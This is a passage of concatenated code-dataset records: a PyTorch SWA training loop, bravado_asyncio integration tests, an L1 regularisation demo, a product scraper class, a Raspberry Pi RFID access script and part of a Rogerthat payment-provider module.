0:\n table = table.split('\\n')\n table = '\\n'.join([table[1]] + table)\n else:\n table = table.split('\\n')[2]\n print(table)\n\nif args.init_epochs % args.save_freq != 0:\n utils.save_checkpoint(\n args.dir,\n args.init_epochs,\n name='init',\n epoch=args.init_epochs,\n state_dict=model.state_dict(),\n optimizer=optimizer.state_dict()\n )\n\ncolumns = ['ep', 'lr', 'tr_loss', 'tr_acc', 'te_loss', 'te_acc', 'te_top5_acc', 'time', 'mem_usage']\ncolumns = columns[:-2] + ['swa_tr_loss', 'swa_tr_acc', 'swa_te_loss', 'swa_te_acc', 'swa_te_top5_acc'] + columns[-2:]\nswa_res = {'loss': None, 'accuracy': None, 'top5_accuracy': None}\n\n\nt = 0\nn_swa = 0\nfor epoch in range(0, args.swa_epochs):\n time_ep = time.time()\n\n loss_sum = 0.0\n correct = 0.0\n for input, target in loaders['train']:\n if args.device.type == 'cuda':\n input = input.cuda(non_blocking=True)\n target = target.cuda(non_blocking=True)\n\n loss, output, stats = criterion(model, input, target)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n loss_sum += loss.data.item() * input.size(0)\n\n pred = output.data.argmax(1, keepdim=True)\n correct += pred.eq(target.data.view_as(pred)).sum().item()\n\n if t % args.swa_gap == 0:\n for param, swa_param in zip(model.parameters(), swa_model.parameters()):\n swa_param.data += (param.data - swa_param.data) / (n_swa + 1)\n n_swa += 1\n\n t += 1\n\n loss_sum /= len(loaders['train'].dataset)\n correct /= len(loaders['train'].dataset)\n\n if epoch == 0 or epoch % args.eval_freq == args.eval_freq - 1 or epoch == args.swa_epochs - 1:\n test_res = utils.eval(loaders['test'], model, criterion)\n train_res = utils.train_epoch(loaders['train'], model, criterion, optimizer)\n utils.bn_update(loaders['train'], swa_model)\n train_swa_res = utils.eval(loaders['train'], swa_model, criterion)\n swa_res = utils.eval(loaders['test'], swa_model, criterion)\n time_ep = time.time() - time_ep\n memory_usage = torch.cuda.memory_allocated() / (1024.0 ** 3)\n\n values = [args.init_epochs + epoch + 1, args.lr, train_res['loss'], train_res['accuracy'], test_res['loss'],\n test_res['accuracy'],\n test_res['top5_accuracy'], time_ep, memory_usage]\n values = values[:-2] + [train_swa_res['loss'], train_swa_res['accuracy'],\n swa_res['loss'], swa_res['accuracy'], swa_res['top5_accuracy']] + values[-2:]\n\n np.savez(\n args.dir + 'Padam-nogap-stats-' + str(args.init_epochs) + str(epoch+1),\n train_loss=train_res['loss'],\n time_ep=time_ep,\n memory_usage=memory_usage,\n train_accuracy=train_res['accuracy'],\n train_top5_accuracy=train_res['top5_accuracy'],\n test_loss=test_res['loss'],\n test_accuracy=test_res['accuracy'],\n test_top5_accuracy=test_res['top5_accuracy'],\n swag_loss=swa_res['loss'],\n swag_train_loss=train_swa_res['loss'],\n swag_train_acc=train_swa_res['accuracy'],\n swag_accuracy=swa_res['accuracy'],\n swag_top5_accuracy=swa_res['top5_accuracy']\n )\n\n else:\n test_res = {'loss': None, 'accuracy': None}\n swa_res = {'loss': None, 'accuracy': None}\n\n time_ep = time.time() - time_ep\n memory_usage = torch.cuda.memory_allocated() / (1024.0 ** 3)\n\n\n\n\n\n\n\n table = tabulate.tabulate([values], columns, tablefmt='simple', floatfmt='8.4f')\n if epoch % 40 == 0:\n table = table.split('\\n')\n table = '\\n'.join([table[1]] + table)\n else:\n table = table.split('\\n')[2]\n print(table)\n\n if (epoch + 1) % args.save_freq == 0:\n utils.save_checkpoint(\n args.dir,\n args.init_epochs + epoch + 1,\n epoch=args.init_epochs + epoch + 1,\n state_dict=model.state_dict(),\n 
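            # this periodic checkpoint holds the raw (non-averaged) model; the running
            # SWA average is saved separately just below under name='swa'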
optimizer=optimizer.state_dict()\n )\n\n utils.save_checkpoint(\n args.dir,\n args.init_epochs + epoch + 1,\n name='swa',\n epoch=args.init_epochs + epoch + 1,\n state_dict=swa_model.state_dict(),\n )\n\n# utils.save_checkpoint(\n# args.dir,\n# args.init_epochs + args.swa_epochs,\n# epoch=args.init_epochs + args.swa_epochs,\n# state_dict=model.state_dict(),\n# optimizer=optimizer.state_dict()\n# )\n#\n# utils.save_checkpoint(\n# args.dir,\n# args.init_epochs + args.swa_epochs,\n# name='swa',\n# epoch=args.init_epochs + args.swa_epochs,\n# state_dict=swa_model.state_dict(),\n# )","sub_path":"BatchHess_Code/run_gadam_gap.py","file_name":"run_gadam_gap.py","file_ext":"py","file_size_in_byte":9895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"171263845","text":"import asyncio\nimport io\nimport os.path\nimport time\n\nimport pytest\nfrom bravado import requests_client\nfrom bravado.client import SwaggerClient\nfrom bravado.exception import BravadoTimeoutError\nfrom bravado.exception import HTTPBadRequest\nfrom bravado.exception import HTTPInternalServerError\nfrom bravado.exception import HTTPNotFound\n\nfrom bravado_asyncio import http_client\n\n\n@pytest.fixture(params=[http_client.AsyncioClient, requests_client.RequestsClient])\ndef swagger_client(integration_server, request):\n # Run all integration tests twice, once with our AsyncioClient and once again with the RequestsClient\n # to make sure they both behave the same.\n # Once this integration suite has become stable (i.e. we're happy with the approach and the test coverage)\n # it could move to bravado and test all major HTTP clients (requests, fido, asyncio).\n spec_url = '{}/swagger.yaml'.format(integration_server)\n return SwaggerClient.from_url(\n spec_url,\n http_client=request.param(),\n config={'also_return_response': True},\n )\n\n\ndef test_get_query_args(swagger_client):\n result, response = swagger_client.user.loginUser(\n username='asyncio',\n password='p%s&wörd?',\n invalidate_sessions=True,\n ).result(timeout=1)\n\n assert result == 'success'\n # let's make sure we can access the headers through the response object\n assert response.headers['X-Rate-Limit'] == '4711'\n assert response.headers['X-Expires-After'] == 'Expiration date'\n\n\ndef test_param_multi(swagger_client):\n result, response = swagger_client.pet.getPetsByIds(\n petIds=[23, 42],\n ).result(timeout=1)\n\n assert len(result) == 2\n assert result[0]._as_dict() == {\n 'id': 23,\n 'name': 'Takamoto',\n 'photoUrls': [],\n 'category': None,\n 'status': None,\n 'tags': None,\n }\n assert result[1]._as_dict() == {\n 'id': 42,\n 'name': 'Lili',\n 'photoUrls': [],\n 'category': None,\n 'status': None,\n 'tags': None,\n }\n\n\ndef test_response_headers(swagger_client):\n \"\"\"Make sure response headers are returned in the same format across HTTP clients. 
Namely,\n make sure names and values are str, and that it's possible to access headers in a\n case-insensitive manner.\"\"\"\n _, response = swagger_client.pet.getPetById(petId=42).result(timeout=1)\n assert response.headers['content-type'] == response.headers['Content-Type'] == 'application/json; charset=utf-8'\n\n\ndef test_post_form_data(swagger_client):\n result, _ = swagger_client.pet.updatePetWithForm(\n petId=12,\n name='Vivi',\n status='sold',\n userId=42,\n photoUrls=('http://first.url?param1=value1¶m2=ß%$', 'http://second.url'),\n ).result(timeout=1)\n assert result is None\n\n\ndef test_put_json_body(swagger_client):\n # the test server would raise a 404 if the data didn't match\n result, _ = swagger_client.pet.updatePet(\n body={\n 'id': 42,\n 'category': {\n 'name': 'extracute',\n },\n 'name': 'Lili',\n 'photoUrls': [],\n 'status': 'sold',\n },\n ).result(timeout=1)\n\n assert result is None\n\n\ndef test_delete_query_args(swagger_client):\n result, _ = swagger_client.pet.deletePet(petId=5).result(timeout=1)\n assert result is None\n\n\ndef test_post_file_upload(swagger_client):\n with open(os.path.join(os.path.dirname(__file__), '../../testing/sample.jpg'), 'rb') as image:\n result, _ = swagger_client.pet.uploadFile(\n petId=42,\n file=image,\n userId=12,\n ).result(timeout=1)\n\n\ndef test_post_file_upload_stream_no_name(swagger_client):\n with open(os.path.join(os.path.dirname(__file__), '../../testing/sample.jpg'), 'rb') as image:\n bytes_io = io.BytesIO(image.read()) # BytesIO has no attribute 'name'\n result, _ = swagger_client.pet.uploadFile(\n petId=42,\n file=bytes_io,\n userId=12,\n ).result(timeout=1)\n\n\ndef test_get_msgpack(swagger_client):\n result, response = swagger_client.pet.getPetsByName(petName='lili').result(timeout=1)\n\n assert len(result) == 1\n assert result[0]._as_dict() == {\n 'id': 42,\n 'name': 'Lili',\n 'photoUrls': [],\n 'category': None,\n 'status': None,\n 'tags': None,\n }\n assert response.headers['Content-Type'] == 'application/msgpack'\n\n\ndef test_server_400(swagger_client):\n with pytest.raises(HTTPBadRequest):\n swagger_client.user.loginUser(username='not', password='correct').result(timeout=1)\n\n\ndef test_server_404(swagger_client):\n with pytest.raises(HTTPNotFound):\n swagger_client.pet.getPetById(petId=5).result(timeout=1)\n\n\ndef test_server_500(swagger_client):\n with pytest.raises(HTTPInternalServerError):\n swagger_client.pet.deletePet(petId=42).result(timeout=1)\n\n\ndef test_timeout_on_future(swagger_client):\n with pytest.raises(BravadoTimeoutError):\n bravado_future = swagger_client.store.getInventory()\n bravado_future.result(timeout=0.1)\n\n\n@pytest.mark.xfail(reason='Timeout exception is not raised reliably for AsyncioClient')\ndef test_timeout_request_options(swagger_client):\n with pytest.raises(BravadoTimeoutError):\n bravado_future = swagger_client.store.getInventory(_request_options={'timeout': 0.1})\n bravado_future.result(timeout=None)\n\n\n@pytest.mark.xfail(reason='Execution time is not always below 2 seconds especially for Python 3.5')\ndef test_client_from_asyncio(integration_server):\n \"\"\"Let's make sure that the event loop for our HTTP client that runs in a different thread\n behaves properly with the 'standard' asyncio loop that people would normally use when doing\n asynchronous programming. 
While we're at it, let's also make sure two instances of\n AsyncioClient work well together.\"\"\"\n # recreate the separate event loop and client session for the HTTP client so we start with a clean slate\n # this is important since we measure the time this test takes, and the test_timeout() tasks might\n # interfere with it\n http_client.client_session.close()\n http_client.client_session = None\n # not going to properly shut down the running loop, this will be cleaned up on exit\n http_client.loop = None\n\n loop = asyncio.get_event_loop()\n start_time = time.time()\n loop.run_until_complete(_test_asyncio_client(integration_server))\n end_time = time.time()\n\n # There are three things being executed asynchronously:\n # 1. sleep 1 second in the main event loop\n # 2. fetch the response for client1 (the server sleeps 1 second)\n # 3. fetch the response for client2 (the server sleeps 1 second)\n # All of this combined should take only a bit more than one second.\n # While this assertion could become flaky depending on how busy the system that runs the test\n # is for now it's a nice confirmation that things work as expected. We can remove it later if\n # it becomes a problem.\n assert end_time - start_time < 2\n\n\nasync def sleep_coroutine():\n await asyncio.sleep(1)\n return 42\n\n\nasync def get_swagger_client(spec_url):\n return SwaggerClient.from_url(\n spec_url,\n http_client=http_client.AsyncioClient(),\n )\n\n\nasync def _test_asyncio_client(integration_server):\n spec_url = '{}/swagger.yaml'.format(integration_server)\n # schedule our first coroutine (after _test_asyncio_client) in the default event loop\n future = asyncio.ensure_future(sleep_coroutine())\n # more work for the default event loop\n client1 = await get_swagger_client(spec_url)\n client2 = await get_swagger_client(spec_url.replace('localhost', '127.0.0.1'))\n\n # two tasks for the event loop running in a separate thread\n future1 = client1.store.getInventory()\n future2 = client2.store.getInventory()\n\n result = await future\n assert result == 42\n\n result1 = future1.result(timeout=5)\n assert result1 == {}\n\n result2 = future2.result(timeout=5)\n assert result2 == {}\n\n return True\n","sub_path":"tests/integration/integration_test.py","file_name":"integration_test.py","file_ext":"py","file_size_in_byte":8103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"473614683","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\n\n# Over Fit Model\nclass OverFitModel(torch.nn.Module):\n def __init__(self):\n super(OverFitModel, self).__init__()\n self.linear = torch.nn.Linear(5, 1) # One in and one out\n\n def forward(self, x):\n return self.linear(x)\n\nif __name__ == \"__main__\":\n # all data\n train_x_plot_u = np.arange(0, 5 + 1, 0.01)\n train_x_plot_o = np.array([[e, e ** 2, e**3, e**4, e**5] for e in train_x_plot_u])\n train_x_u = np.arange(0, 5 + 1, 1)\n train_x_o = np.array([[e, e ** 2, e**3, e**4, e**5] for e in train_x_u])\n # train_noise = -3 + 6 * np.random.rand(len(train_x_u)) \n train_noise = np.array([-2.06345651, 0.06141883, -2.26895645, -2.03486411, 1.28754263, -2.5007614 ])\n train_y = (train_x_u - 2.5 ) ** 2 + 7 + train_noise\n \n test_x_plot_u = np.arange(6, 9 + 1, 0.01)\n test_x_plot_o = np.array([[e, e ** 2, e**3, e**4, e**5] for e in test_x_plot_u])\n test_x_u = np.arange(6, 9 + 1, 1)\n test_x_o = np.array([[e, e ** 2, e**3, e**4, e**5] for e in test_x_u])\n test_y = (test_x_u - 2.5 ) 
** 2 + 7\n\n # numpy to torch.tensor\n train_tensor_x_plot_u = torch.Tensor([[e] for e in train_x_plot_u]) # 将1维的数据转换为2维数据\n train_tensor_x_plot_o = torch.Tensor(train_x_plot_o) # 将1维的数据转换为2维数据\n train_tensor_x_u= torch.Tensor([[e] for e in train_x_u]) # 将1维的数据转换为2维数据\n train_tensor_x_o= torch.Tensor(train_x_o) # 将1维的数据转换为2维数据\n train_tensor_y = torch.Tensor([[e] for e in train_y])\n\n\n test_tensor_x_plot_u = torch.Tensor([[e] for e in test_x_plot_u]) # 将1维的数据转换为2维数据\n test_tensor_x_plot_o = torch.Tensor(test_x_plot_o) # 将1维的数据转换为2维数据\n test_tensor_x_u= torch.Tensor([[e] for e in test_x_u]) # 将1维的数据转换为2维数据\n test_tensor_x_o= torch.Tensor(test_x_o) # 将1维的数据转换为2维数据\n test_tensor_y = torch.Tensor([[e] for e in test_y])\n\n n_train_time_over_fit = 240000\n # n_train_time_over_fit = 10\n\n\n \n\n y_lim = [0, 20]\n \n # Over Fit Train \n over_fit_model = OverFitModel()\n loss_fun = torch.nn.MSELoss() # Defined loss function\n over_fit_opt = torch.optim.Adam(over_fit_model.parameters(), lr=0.01) # Defined optimizer\n for epoch in range(n_train_time_over_fit):\n tmp_pred_tensor_y = over_fit_model(train_tensor_x_o) # Forward pass\n loss = loss_fun(tmp_pred_tensor_y, train_tensor_y) # Compute loss\n if epoch % (n_train_time_over_fit/10) == 0:\n print(epoch, loss.data.numpy())\n over_fit_opt.zero_grad() # Zero gradients \n loss.backward() # perform backward pass\n over_fit_opt.step() # update weights\n over_fit_train_y = over_fit_model(train_tensor_x_o)\n loss_over_fit_train = loss_fun(over_fit_train_y, train_tensor_y).data.numpy()\n over_fit_plot_train_y = over_fit_model(train_tensor_x_plot_o)\n\n over_fit_test_y = over_fit_model(test_tensor_x_o)\n loss_over_fit_test = loss_fun(over_fit_test_y, test_tensor_y).data.numpy()\n over_fit_plot_test_y = over_fit_model(test_tensor_x_plot_o) \n print(\"Done over fit\")\n\n\n\n\n\n\n\n # L1 normlization Fit Train \n over_fit_model = OverFitModel()\n loss_fun = torch.nn.MSELoss()\n l1_lambda = torch.tensor(1000.)\n\n # over_fit_opt = torch.optim.Adam(over_fit_model.parameters(), lr=0.01, weight_decay=10) # With L2 normlization\n over_fit_opt = torch.optim.Adam(over_fit_model.parameters(), lr=0.01) # With L2 normlization\n for epoch in range(n_train_time_over_fit):\n tmp_pred_tensor_y = over_fit_model(train_tensor_x_o) # Forward pass\n loss = loss_fun(tmp_pred_tensor_y, train_tensor_y) # Compute loss\n\n # use L1 normlization\n l1_loss = torch.tensor(0.)\n for param in over_fit_model.parameters():\n l1_loss += torch.sum(torch.abs(param))\n loss += l1_lambda * l1_loss\n\n if epoch % (n_train_time_over_fit/10) == 0:\n print(epoch, loss.data.numpy())\n over_fit_opt.zero_grad() # Zero gradients \n loss.backward() # perform backward pass\n over_fit_opt.step() # update weights\n l2_train_y = over_fit_model(train_tensor_x_o)\n loss_l2_train = loss_fun(l2_train_y, train_tensor_y).data.numpy()\n l2_plot_train_y = over_fit_model(train_tensor_x_plot_o)\n\n l2_test_y = over_fit_model(test_tensor_x_o)\n loss_l2_test = loss_fun(l2_test_y, test_tensor_y).data.numpy()\n l2_plot_test_y = over_fit_model(test_tensor_x_plot_o) \n print(\"Done L1 normalization \")\n\n\n\n plt.figure()\n\n plt.subplot(2,2,1) \n plt.title(\"Over Fit(Train Set), Loss=%.3f\" % loss_over_fit_train) \n plt.xlabel(\"x\") \n plt.ylabel(\"y\") \n plt.scatter(train_x_u, train_y)\n plt.plot(train_x_plot_u, over_fit_plot_train_y.data.numpy(), color='red')\n plt.ylim(y_lim)\n for a, b in zip(train_x_u, train_y): \n plt.text(a, b, np.round(b, 1),ha='center', va='bottom', fontsize=10) \n\n \n plt.subplot(2,2,2) 
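    # second panel: the L1-regularised fit on the training data (the l2_* variable
    # names are leftovers from an L2 variant; the penalty actually added above is L1)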
\n plt.title(\"L1 normlization(Train Set), Loss=%.3f\" % loss_l2_train) \n plt.xlabel(\"x\") \n plt.ylabel(\"y\") \n plt.scatter(train_x_u, train_y)\n plt.plot(train_x_plot_u, l2_plot_train_y.data.numpy(), color='orange')\n plt.ylim(y_lim)\n for a, b in zip(train_x_u, train_y): \n plt.text(a, b, np.round(b, 1),ha='center', va='bottom', fontsize=10) \n\n\n\n\n plt.subplot(2,2,3) \n plt.title(\"Over Fit(Test Set), Loss=%.3f\" % loss_over_fit_test) \n plt.xlabel(\"x\") \n plt.ylabel(\"y\") \n plt.scatter(test_x_u, test_y)\n plt.plot(test_x_plot_u, over_fit_plot_test_y.data.numpy(), color='red')\n plt.ylim([-1000,1000])\n for a, b in zip(test_x_u, test_y): \n plt.text(a, b, np.round(b, 1),ha='center', va='bottom', fontsize=10) \n \n plt.subplot(2,2,4) \n plt.title(\"L1 normlization (Test Set), Loss=%.3f\" % loss_l2_test) \n plt.xlabel(\"x\") \n plt.ylabel(\"y\") \n plt.scatter(test_x_u, test_y)\n plt.plot(test_x_plot_u, l2_plot_test_y.data.numpy(), color='orange')\n plt.ylim([0, 100])\n for a, b in zip(test_x_u, test_y): \n plt.text(a, b, np.round(b, 1),ha='center', va='bottom', fontsize=10) \n plt.show()","sub_path":"plot_fit/over_filt_L1.py","file_name":"over_filt_L1.py","file_ext":"py","file_size_in_byte":6293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"180938024","text":"#!/usr/bin/env python3\n\nimport re # Regex module\nfrom sites.api import * # Sites API's\n\nclass Product:\n '''\n Class to hold product details\n '''\n def __init__(self, link):\n self.link = link # Product link\n self.fetched = False # Fetch state\n\n def __repr__(self):\n return \"{}\".format(self.link.split('/')[-1])\n\n def fetch(self):\n '''\n Will be responsible for the comunication with the correct API\n '''\n if self.link != '' and self.fetched == False:\n # Check which API to use\n self.api = choose_api(self.link)\n\n # Store product info on the self.info\n self.info = self.api.fetch(self.api, self.link)\n self.fetched = True\n\n else:\n if self.link == '':\n raise Exception('Link is empty')\n\n def get_title(self):\n '''\n Will return the title of the product\n '''\n if self.fetched == False:\n # try:\n self.fetch()\n return self.info['title']\n # except:\n # return \"No title available! 
Link: {}\".format(self.link[-15:])\n else:\n return self.info['title']\n\n def get_price(self):\n '''\n Will return the price of the product\n '''\n if self.fetched == False:\n # try:\n self.fetch()\n return self.info['price']\n # except:\n # return 0\n else:\n return self.info['price']\n\n def get_discount(self):\n '''\n Get the boolean\n '''\n if self.fetched == False:\n self.fetch()\n return self.info['discount']\n else:\n return self.info['discount']\n","sub_path":"src/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"401372188","text":"# -*- coding: utf8 -*-\nfrom Adafruit_CharLCD import Adafruit_CharLCD\nimport time\nimport MFRC522\nimport RPi.GPIO as GPIO\nfrom time import sleep\npin=19\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(pin, GPIO.OUT)\n\n# UID dos cartões que possuem acesso liberado.\nCARTOES_LIBERADOS = {\n 'B4:8F:C6:CB:36': 'tag1',\n 'E3:E5:68:9A:F4': 'tag2',\n 'A4:42:26:5:C5': 'Cartaozinho',\n '48:F1:74:19:D4': 'Joao',\n}\nlcd = Adafruit_CharLCD(7, 13, 6, 24, 5, 16, 20, 4)\nflag=0\n\n\ntry:\n # Inicia o módulo RC522.\n LeitorRFID = MFRC522.MFRC522()\n lcd.clear()\n lcd.message('Aproxime seu cartao RFID')\n print('Aproxime seu cartão RFID')\n \n while True:\n # Verifica se existe uma tag próxima do módulo.\n status, tag_type = LeitorRFID.MFRC522_Request(LeitorRFID.PICC_REQIDL)\n \n if (status == LeitorRFID.MI_OK and flag==0):\n \n print('Cartão detectado!')\n lcd.clear()\n lcd.message('Cartao detectado!')\n flag=1\n # Efetua leitura do UID do cartão.\n status, uid = LeitorRFID.MFRC522_Anticoll()\n \n if status == LeitorRFID.MI_OK:\n uid = ':'.join(['%X' % x for x in uid])\n lcd.clear()\n lcd.message('UID do cartao: %s' % uid)\n print('UID do cartão: %s' % uid)\n \n \n # Se o cartão está liberado exibe mensagem de boas vindas.\n if uid in CARTOES_LIBERADOS:\n print('Acesso Liberado!')\n lcd.clear()\n lcd.message('Ola %s.' % CARTOES_LIBERADOS[uid])\n print('Olá %s.' 
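                    # ('Olá %s.' is Portuguese for 'Hello %s.'; the PWM burst a few lines
                    # below presumably pulses a buzzer or relay on GPIO 19 as an access-granted cue)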
% CARTOES_LIBERADOS[uid])\n p = GPIO.PWM(pin, 1024)\n p.start(99)\n sleep(0.25)\n p.stop()\n \n else:\n lcd.clear()\n lcd.message('Acesso negado!')\n print('Acesso Negado!')\n \n time.sleep(2)\n lcd.clear()\n lcd.message('Aproxime seu cartao RFID')\n print('\\n')\n print('Aproxime seu cartão RFID')\n print('\\n')\n \n elif(status == LeitorRFID.MI_ERR and flag==1):\n flag = 0\n \n time.sleep(2)\nexcept KeyboardInterrupt:\n # Se o usuário precionar Ctrl + C\n # encerra o programa.\n #GPIO.cleanup()\n print('Programa encerrado.')","sub_path":"codigo rfid.py","file_name":"codigo rfid.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"258416911","text":"# -*- coding: utf-8 -*-\n# Copyright 2017 GIG Technology NV\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# @@license_version:1.3@@\n\nimport httplib\nimport json\nimport logging\nimport urllib\nimport uuid\n\nfrom google.appengine.api import urlfetch\nfrom google.appengine.ext import deferred\n\nfrom mcfw.rpc import returns, arguments, parse_complex_value\nfrom rogerthat.bizz.payment import sync_payment_asset, sync_payment_database\nfrom rogerthat.bizz.payment.providers.threefold.consts import PAYMENT_PROVIDER_ID\nfrom rogerthat.bizz.payment.state import add_code_to_login_state\nfrom rogerthat.bizz.user import get_lang\nfrom rogerthat.dal.payment import get_payment_provider, get_payment_user\nfrom rogerthat.exceptions.payment import PaymentException\nfrom rogerthat.rpc import users\nfrom rogerthat.settings import get_server_settings\nfrom rogerthat.to.payment import GetPaymentProfileResponseTO, PaymentProviderAssetTO, CreatePaymentAssetTO, \\\n CryptoTransactionTO, ErrorPaymentTO, GetPaymentTransactionsResponseTO, CreateTransactionResultTO, TargetInfoTO\nfrom rogerthat.utils import urlencode\n\n\ndef web_callback(handler, path, params):\n \"\"\"\n Args:\n handler (webapp2.RequestHandler)\n path (unicode)\n params (dict)\n \"\"\"\n if u'oauth' == path:\n handle_oauth(handler, params)\n elif u'sync' == path:\n handle_sync(handler, params)\n else:\n handler.abort(404)\n\n\ndef handle_code(login_state):\n \"\"\"\n This method should in theory be the same for every payment provider if they implement oauth properly\n Args:\n login_state (rogerthat.models.payment.PaymentOauthLoginState)\n Returns:\n dict\n \"\"\"\n provider = get_payment_provider(PAYMENT_PROVIDER_ID)\n parameters = {\n 'code': login_state.code,\n 'redirect_uri': provider.redirect_url(get_server_settings().baseUrl),\n 'client_id': provider.oauth_settings.client_id,\n 'client_secret': provider.oauth_settings.secret,\n 'state': login_state.state\n }\n url = '%s?%s' % (provider.oauth_settings.token_url, urllib.urlencode(parameters))\n logging.debug('URL: %s', url)\n result = urlfetch.fetch(url, method=urlfetch.POST)\n if result.status_code != httplib.OK:\n logging.error('Failed to get acccess token. 
%s: %s', result.status_code, result.content)\n raise Exception('Failed to get access token')\n return json.loads(result.content)\n\n\ndef handle_oauth(handler, params):\n state = params['state']\n code = params['code']\n app_id = add_code_to_login_state(state, code)\n if not app_id:\n handler.abort(400)\n return\n\n url = 'oauth-%s://x-callback-url' % app_id.encode('utf8')\n args = {'state': state, 'code': code}\n handler.redirect(str('%s?%s' % (url, urllib.urlencode(args))))\n\n\ndef handle_sync(handler, params):\n payment_provider = get_payment_provider(PAYMENT_PROVIDER_ID)\n if payment_provider.get_setting('payment_secret') != handler.request.headers.get(\"Authorization\"):\n handler.abort(403)\n return\n\n app_user = users.User(params['app_user'])\n asset_id = params['asset_id']\n \n payment_user = get_payment_user(app_user)\n if payment_user and payment_user.has_asset(PAYMENT_PROVIDER_ID, asset_id):\n deferred.defer(sync_payment_asset, app_user, PAYMENT_PROVIDER_ID, asset_id)\n else:\n deferred.defer(sync_payment_database, app_user)\n\n\n@returns(GetPaymentProfileResponseTO)\n@arguments(app_user=users.User)\ndef get_payment_profile(app_user):\n response = GetPaymentProfileResponseTO()\n response.first_name = u'FAKE fn'\n response.last_name = u'FAKE ln'\n return response\n\n\ndef _get_payment_request_params():\n payment_provider = get_payment_provider(PAYMENT_PROVIDER_ID)\n payment_url = payment_provider.get_setting('payment_url')\n payment_secret = payment_provider.get_setting('payment_secret')\n\n headers = {}\n headers['Authorization'] = payment_secret\n return payment_url, headers\n\n\ndef _execute_payment_request(path, args):\n base_url, headers = _get_payment_request_params()\n\n result = urlfetch.fetch(\n url=u\"%s/%s?%s\" % (base_url, path, urlencode(args)),\n method=urlfetch.GET,\n headers=headers,\n deadline=10)\n\n if result.status_code != 200:\n return None\n\n return json.loads(result.content)\n\n\n@returns([PaymentProviderAssetTO])\n@arguments(app_user=users.User, currency=unicode)\ndef get_payment_assets(app_user, currency=None):\n args = dict()\n args[\"app_user\"] = app_user.email()\n result = _execute_payment_request(u'assets', args)\n if not result:\n return []\n return parse_complex_value(PaymentProviderAssetTO, result, True)\n\n\n@returns(PaymentProviderAssetTO)\n@arguments(app_user=users.User, asset_id=unicode)\ndef get_payment_asset(app_user, asset_id):\n result = _execute_payment_request(u'assets/%s' % urllib.quote(asset_id), dict())\n if not result:\n return None\n return parse_complex_value(PaymentProviderAssetTO, result, False)\n\n\n@returns(unicode)\n@arguments(app_user=users.User, asset_id=unicode)\ndef get_payment_asset_currency(app_user, asset_id):\n return asset_id.rsplit(u\":\", 1)[1]\n\n\n@returns(PaymentProviderAssetTO)\n@arguments(app_user=users.User, asset=CreatePaymentAssetTO)\ndef create_payment_asset(app_user, asset):\n language = get_lang(app_user)\n raise PaymentException(ErrorPaymentTO.ACCOUNT_ALREADY_EXISTS, language,\n {'currency': asset.currency})\n\n\n@returns(tuple)\n@arguments(asset_id=unicode, transaction_type=unicode, cursor=unicode)\ndef _get_transactions_by_type(asset_id, transaction_type, cursor):\n args = dict()\n args[\"asset_id\"] = asset_id\n args[\"transaction_type\"] = transaction_type\n if cursor:\n args[\"cursor\"] = cursor\n result = _execute_payment_request(u'transactions', args)\n if not result:\n return [], None\n to = parse_complex_value(GetPaymentTransactionsResponseTO, result, False)\n return to.transactions, 
to.cursor\n\n\n@returns(tuple)\n@arguments(app_user=users.User, asset_id=unicode, cursor=unicode)\ndef get_confirmed_transactions(app_user, asset_id, cursor=None):\n return _get_transactions_by_type(asset_id, u\"confirmed\", cursor)\n\n\n@returns(tuple)\n@arguments(app_user=users.User, asset_id=unicode, cursor=unicode)\ndef get_pending_transactions(app_user, asset_id, cursor=None):\n return _get_transactions_by_type(asset_id, u\"pending\", cursor)\n\n\n@returns(bool)\n@arguments(app_user=users.User, asset_id=unicode, code=unicode)\ndef verify_payment_asset(app_user, asset_id, code):\n raise NotImplementedError(u'verify_payment_asset is not implemented yet')\n\n\n@returns(CryptoTransactionTO)\n@arguments(app_user=users.User, transaction_id=unicode, from_asset_id=unicode, to_asset_id=unicode, amount=(int, long),\n currency=unicode, memo=unicode, precision=(int, long))\ndef get_payment_signature_data(app_user, transaction_id, from_asset_id, to_asset_id, amount, currency, memo, precision):\n return None\n\n\n@returns(unicode)\n@arguments(from_user=users.User, to_user=users.User, transaction_id=unicode, from_asset_id=unicode, to_asset_id=unicode,\n amount=(int, long), currency=unicode, memo=unicode, precision=(int, long), crypto_transaction=CryptoTransactionTO)\ndef confirm_payment(from_user, to_user, transaction_id, from_asset_id, to_asset_id, amount, currency, memo,\n precision, crypto_transaction):\n return _create_transaction(transaction_id, amount, precision, memo, from_asset_id, to_asset_id, from_user)\n\n\n@returns()\n@arguments()\ndef sync():\n pass\n\n\n@returns(CreateTransactionResultTO)\n@arguments(app_user=users.User, params=unicode)\ndef create_transaction(app_user, params):\n transaction_id = unicode(uuid.uuid4())\n payload = json.loads(params)\n\n status = _create_transaction(transaction_id,\n payload['amount'],\n payload['precision'],\n payload['memo'],\n payload['from_asset_id'],\n payload['to_asset_id'],\n app_user)\n\n result_params = {\n u'app_user': app_user.email(),\n u'success': True,\n u'provider_id': PAYMENT_PROVIDER_ID,\n u'transaction_id': transaction_id,\n u'status': status\n }\n\n r = CreateTransactionResultTO()\n r.params = unicode(json.dumps(result_params))\n r.transaction_id = transaction_id\n return r\n\n\n@returns(dict)\n@arguments(transaction_id=unicode)\ndef get_public_transaction(transaction_id):\n return _execute_payment_request(u'transactions/%s/public' % transaction_id, {})\n\n\ndef _create_transaction(transaction_id, amount, precision, memo, from_asset_id, to_asset_id, app_user):\n base_url, headers = _get_payment_request_params()\n 